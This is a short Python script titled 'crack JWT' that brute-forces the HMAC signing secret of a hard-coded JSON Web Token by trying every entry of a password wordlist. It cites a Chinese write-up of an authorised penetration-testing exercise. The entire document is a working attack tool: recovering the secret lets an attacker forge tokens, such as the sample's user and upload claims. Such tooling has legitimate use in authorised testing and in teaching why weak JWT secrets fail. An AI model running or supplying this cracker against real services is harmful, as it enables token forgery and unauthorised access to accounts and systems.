crack JWT

1. import jwt
2. import termcolor
3. # paper《全程带阻：记一次授权网络攻防演练（上）》，https://www.freebuf.com/vuls/211842.html，more http://yangyangwithgnu.github.io/
4.  
5. jwt_str = R'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoibmFuYSIsImFjdGlvbiI6InVwbG9hZCJ9.56wwCrB9tIgmUnYpLPxkO8GYj1soCjuu_skTlbH_Gg8'
6.  
7. with open('/your/wordlist/passwd/top10000.txt') as f:
8.     for line in f:
9.         key_ = line.strip()
10.         try:
11.             jwt.decode(jwt_str, verify=True, key=key_)
12.             print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
13.             break
14.         except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
15.             print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
16.             break
17.         except jwt.exceptions.InvalidSignatureError:
18.             print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
19.             continue
20.     else:
21.         print('\r', '\bsorry! no key be found.')